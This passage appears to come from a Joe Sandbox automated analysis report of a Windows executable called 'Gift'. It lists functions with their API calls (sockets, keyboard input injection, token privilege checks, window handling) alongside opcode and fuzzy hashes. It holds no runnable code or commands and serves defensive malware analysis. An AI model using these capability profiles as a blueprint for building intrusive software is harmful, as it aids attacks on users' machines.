                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$__itow
                                                                          • String ID:
                                                                          • API String ID: 3379773720-0
                                                                          • Opcode ID: 030028c7b37deebb43cec74f72454460e635ced1a8c86014da8cd607790aa03c
                                                                          • Instruction ID: ae5c92aafbc008285518f56b4a60eef7c7874e3c7392fafa89e2726291da4218
                                                                          • Opcode Fuzzy Hash: 030028c7b37deebb43cec74f72454460e635ced1a8c86014da8cd607790aa03c
                                                                          • Instruction Fuzzy Hash: B041D170A00758AFDF22EF55D846BEE7BB9EF44750F440029F905A3281DB709A64CBA2
                                                                          Function 00347095 Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • socket.WSOCK32(00000002,00000002,00000011), ref: 003470BC
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 003470CC
                                                                            • Part of subcall function 002D4D37: __itow.LIBCMT ref: 002D4D62
                                                                            • Part of subcall function 002D4D37: __swprintf.LIBCMT ref: 002D4DAC
                                                                          • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00347130
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 0034713C
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$__itow__swprintfsocket
                                                                          • String ID:
                                                                          • API String ID: 2214342067-0
                                                                          • Opcode ID: 10aaf7de5697a087e646f039f7eed6b3ffc5bc282c698181d7ca9ef354cd01aa
                                                                          • Instruction ID: 1a68d2e8b503df5af2c302ca5db6efb104c946a75111e097736c24ac9f335bd3
                                                                          • Opcode Fuzzy Hash: 10aaf7de5697a087e646f039f7eed6b3ffc5bc282c698181d7ca9ef354cd01aa
                                                                          • Instruction Fuzzy Hash: 7B419D716502106FEB25BF24DC8AF2A77E9AB04B14F048459FA599F3D2DBB0AD108F91
                                                                          Function 00346B05 Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00360980), ref: 00346B92
                                                                          • _strlen.LIBCMT ref: 00346BC4
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _strlen
                                                                          • String ID:
                                                                          • API String ID: 4218353326-0
                                                                          • Opcode ID: 6e7f9f451dbf37d418a3991e33fd3d48aed7f64b73354a6ad91a113d717adbb1
                                                                          • Instruction ID: 103e5f0a430416925df2ba9d015efb146405df04166773cad3f1eb55e3d691d3
                                                                          • Opcode Fuzzy Hash: 6e7f9f451dbf37d418a3991e33fd3d48aed7f64b73354a6ad91a113d717adbb1
                                                                          • Instruction Fuzzy Hash: 2B41BE71600218AFCB15FFA5DCD2EAEB3E9EF55310F108155F81A9B292DB30AD11CA91
                                                                          Function 00358E76 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00358F03
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: InvalidateRect
                                                                          • String ID:
                                                                          • API String ID: 634782764-0
                                                                          • Opcode ID: 12f01b032bbf00f798a31501a960a79fae39a06baf88c5ad66ba4c3123d0e500
                                                                          • Instruction ID: 486d6cc1b60ef49a12f8de7aaf715f4b290c93cae5a74b406ecc7876aa9cd40b
                                                                          • Opcode Fuzzy Hash: 12f01b032bbf00f798a31501a960a79fae39a06baf88c5ad66ba4c3123d0e500
                                                                          • Instruction Fuzzy Hash: 6131C034614108AEEB279B14EC4AFA937AAEB09312F144502FE41F61F1CF7199588A51
                                                                          Function 0035B1A9 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ClientToScreen.USER32(?,?), ref: 0035B1D2
                                                                          • GetWindowRect.USER32(?,?), ref: 0035B248
                                                                          • PtInRect.USER32(?,?,0035C6BC), ref: 0035B258
                                                                          • MessageBeep.USER32(00000000), ref: 0035B2C9
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                                          • String ID:
                                                                          • API String ID: 1352109105-0
                                                                          • Opcode ID: f5235360d673c287091a813fe4c1001709f268b16cb7bce5ae3d03c6a294173f
                                                                          • Instruction ID: e76c72dc99d77b9b09dd48a8b87203a716268054d65a6675331c51ce687dc4f4
                                                                          • Opcode Fuzzy Hash: f5235360d673c287091a813fe4c1001709f268b16cb7bce5ae3d03c6a294173f
                                                                          • Instruction Fuzzy Hash: B8418D30A04115DFCB12CF58C885EADBBF9FB49352F1588A9E8189B260D731A849CF60
                                                                          Function 003312D5 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00331326
                                                                          • SetKeyboardState.USER32(00000080,?,00000001), ref: 00331342
                                                                          • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 003313A8
                                                                          • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 003313FA
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                          • String ID:
                                                                          • API String ID: 432972143-0
                                                                          • Opcode ID: 0cbc5b1aaa7d18707e3d26ee9752e9d7726a983d330c26f83a966cae3a3926a3
                                                                          • Instruction ID: 4001b05efeffe929745f6d3b6aa6342883fd7c0761ba77a98eee6ec3697fc365
                                                                          • Opcode Fuzzy Hash: 0cbc5b1aaa7d18707e3d26ee9752e9d7726a983d330c26f83a966cae3a3926a3
                                                                          • Instruction Fuzzy Hash: 97316934A44208AEFF378A25CC86BFEBBB9AB45330F04831AF49152AD1D3748D419B91
                                                                          Function 00331410 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00331465
                                                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 00331481
                                                                          • PostMessageW.USER32(00000000,00000101,00000000), ref: 003314E0
                                                                          • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00331532
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                          • String ID:
                                                                          • API String ID: 432972143-0
                                                                          • Opcode ID: 67d4d722ab891b1f1c94c6cc7fc2f79a14f70e0e09be9c63b62246f78b6f85e9
                                                                          • Instruction ID: bb35932411ee5c65f4ad25e6ac39d4f72fa825b5017830f7c8c5dd60d5cbfd00
                                                                          • Opcode Fuzzy Hash: 67d4d722ab891b1f1c94c6cc7fc2f79a14f70e0e09be9c63b62246f78b6f85e9
                                                                          • Instruction Fuzzy Hash: F0317B309402185EFF3B8B66DC85BFFBBB9AB85310F09831AE481521D1C3788D518BA1
                                                                          Function 003063F5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0030642B
                                                                          • __isleadbyte_l.LIBCMT ref: 00306459
                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00306487
                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 003064BD
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                          • String ID:
                                                                          • API String ID: 3058430110-0
                                                                          • Opcode ID: f3fd2346ce81e13da87f0282f121bf707a3797972e29be76a3504e2607083271
                                                                          • Instruction ID: 08d75344c990b953891afffb831c99fe3d734ccfadb3aefd398afc69b6c66a0f
                                                                          • Opcode Fuzzy Hash: f3fd2346ce81e13da87f0282f121bf707a3797972e29be76a3504e2607083271
                                                                          • Instruction Fuzzy Hash: 4531D231601256AFDB228F76CC96BBB7BA9FF41320F164029E8248B1D5DB31E860DB50
                                                                          Function 0035552B Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetForegroundWindow.USER32 ref: 0035553F
                                                                            • Part of subcall function 00333B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00333B4E
                                                                            • Part of subcall function 00333B34: GetCurrentThreadId.KERNEL32 ref: 00333B55
                                                                            • Part of subcall function 00333B34: AttachThreadInput.USER32(00000000,?,003355C0), ref: 00333B5C
                                                                          • GetCaretPos.USER32(?), ref: 00355550
                                                                          • ClientToScreen.USER32(00000000,?), ref: 0035558B
                                                                          • GetForegroundWindow.USER32 ref: 00355591
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                          • String ID:
                                                                          • API String ID: 2759813231-0
                                                                          • Opcode ID: df900ee20ff9228749baa70ecc7a17ae204955ed222b424d1fd59922c51e1644
                                                                          • Instruction ID: adf719f02a47a2d9ef771a410c5e88536393315aa38fd7938e8c9a3390752b94
                                                                          • Opcode Fuzzy Hash: df900ee20ff9228749baa70ecc7a17ae204955ed222b424d1fd59922c51e1644
                                                                          • Instruction Fuzzy Hash: 80312A71900108AFDB05EFA5D8859EFB7FDEF98304F10406AE915E7211EA71AE548FA1
                                                                          Function 0035CB40 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002D29E2: GetWindowLongW.USER32(?,000000EB), ref: 002D29F3
                                                                          • GetCursorPos.USER32(?), ref: 0035CB7A
                                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0030BCEC,?,?,?,?,?), ref: 0035CB8F
                                                                          • GetCursorPos.USER32(?), ref: 0035CBDC
                                                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0030BCEC,?,?,?), ref: 0035CC16
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                          • String ID:
                                                                          • API String ID: 2864067406-0
                                                                          • Opcode ID: 5df4f45bffc3ec7be1f16a30c0483310f4e02db1f4300c9e30b3eb30e4c629d1
                                                                          • Instruction ID: 945d0c059a4509722732691cd6f1713dc2315b4614552425ab2d435904d54868
                                                                          • Opcode Fuzzy Hash: 5df4f45bffc3ec7be1f16a30c0483310f4e02db1f4300c9e30b3eb30e4c629d1
                                                                          • Instruction Fuzzy Hash: 1D31D234610118AFCB168F94CC5AEFA7BB9EB09311F044099FD0597271C3325D50EFA0
                                                                          Function 002F0BC0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __setmode.LIBCMT ref: 002F0BE2
                                                                            • Part of subcall function 002E402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00337E51,?,?,00000000), ref: 002E4041
                                                                            • Part of subcall function 002E402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00337E51,?,?,00000000,?,?), ref: 002E4065
                                                                          • _fprintf.LIBCMT ref: 002F0C19
                                                                          • OutputDebugStringW.KERNEL32(?), ref: 0032694C
                                                                            • Part of subcall function 002F4CCA: _flsall.LIBCMT ref: 002F4CE3
                                                                          • __setmode.LIBCMT ref: 002F0C4E
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                          • String ID:
                                                                          • API String ID: 521402451-0
                                                                          • Opcode ID: 156c8c64feee2eb5815deb0729a7b929481e51d9793bcde4708b4adc025ad8ce
                                                                          • Instruction ID: 79934b1ceb973f364791d85f460a986dfdc05ce6194b5324eba94d71d9bf7c10
                                                                          • Opcode Fuzzy Hash: 156c8c64feee2eb5815deb0729a7b929481e51d9793bcde4708b4adc025ad8ce
                                                                          • Instruction Fuzzy Hash: 161127319242086ACB09B7B4EC879BFF76D9F40360F140126F304972C2DFB11DA64BA1
                                                                          Function 00329274 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00328D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00328D3F
                                                                            • Part of subcall function 00328D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00328D49
                                                                            • Part of subcall function 00328D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00328D58
                                                                            • Part of subcall function 00328D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00328D5F
                                                                            • Part of subcall function 00328D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00328D75
                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 003292C1
                                                                          • _memcmp.LIBCMT ref: 003292E4
                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0032931A
                                                                          • HeapFree.KERNEL32(00000000), ref: 00329321
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                          • String ID:
                                                                          • API String ID: 1592001646-0
                                                                          • Opcode ID: 4cf573cadf7d5e850f81bf4949fdef37735cced4266938324ae575682056c797
                                                                          • Instruction ID: 977a64b8cea898d02eb3375052e88a4cb27c297d3a3028c079618876603afa87
                                                                          • Opcode Fuzzy Hash: 4cf573cadf7d5e850f81bf4949fdef37735cced4266938324ae575682056c797
                                                                          • Instruction Fuzzy Hash: 46219D31E40219EFDF15DFA4D949BEEB7B8FF44301F05805AE944AB290D770AA04CBA0
                                                                          Function 0035634E Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 003563BD
                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 003563D7
                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 003563E5
                                                                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 003563F3
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Long$AttributesLayered
                                                                          • String ID:
                                                                          • API String ID: 2169480361-0
                                                                          • Opcode ID: 921e638a1242d399ecd3b676e8b64b8bfd5dc1e7acef6f222f01fba0230a512f
                                                                          • Instruction ID: 69789281681825765b7160d3af7e36b5ae546f28b4685db402ee012ba3f4066a
                                                                          • Opcode Fuzzy Hash: 921e638a1242d399ecd3b676e8b64b8bfd5dc1e7acef6f222f01fba0230a512f
                                                                          • Instruction Fuzzy Hash: 7B11DF35304424AFD706AB24DC46FBA77ADEF45321F148119F916CB2F2CBA0AD108B90
                                                                          Function 0032E45A Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0032F858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0032E46F,?,?,?,0032F262,00000000,000000EF,00000119,?,?), ref: 0032F867
                                                                            • Part of subcall function 0032F858: lstrcpyW.KERNEL32(00000000,?), ref: 0032F88D
                                                                            • Part of subcall function 0032F858: lstrcmpiW.KERNEL32(00000000,?,0032E46F,?,?,?,0032F262,00000000,000000EF,00000119,?,?), ref: 0032F8BE
                                                                          • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0032F262,00000000,000000EF,00000119,?,?,00000000), ref: 0032E488
                                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 0032E4AE
                                                                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,0032F262,00000000,000000EF,00000119,?,?,00000000), ref: 0032E4E2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcmpilstrcpylstrlen
                                                                          • String ID: cdecl
                                                                          • API String ID: 4031866154-3896280584
                                                                          • Opcode ID: 9dca07adc4fd900546a7a17fc74a5e4a50fde5da686df5cc881416f3863d97f9
                                                                          • Instruction ID: d020173e6e4c48db49d7aee2fd35b2319dfb565fe9ad92a60639d1d4602e34f4
                                                                          • Opcode Fuzzy Hash: 9dca07adc4fd900546a7a17fc74a5e4a50fde5da686df5cc881416f3863d97f9
                                                                          • Instruction Fuzzy Hash: 2B11933A100355AFDB26AF34EC46D7A77B9FF46350B51802AF906CB2A0EB71D950C791
                                                                          Function 00305312 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _free.LIBCMT ref: 00305331
                                                                            • Part of subcall function 002F593C: __FF_MSGBANNER.LIBCMT ref: 002F5953
                                                                            • Part of subcall function 002F593C: __NMSG_WRITE.LIBCMT ref: 002F595A
                                                                            • Part of subcall function 002F593C: RtlAllocateHeap.NTDLL(01360000,00000000,00000001,?,00000004,?,?,002F1003,?), ref: 002F597F
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: AllocateHeap_free
                                                                          • String ID:
                                                                          • API String ID: 614378929-0
                                                                          • Opcode ID: 2c56bf9749efdcbddaad8dbb5a3f9aa210340fd38c6ae3a4cd9a19963dd1f14e
                                                                          • Instruction ID: 1b108371a5fa02297e360d384a211b930a71c5fdbb82f44cae22f87cd657839f
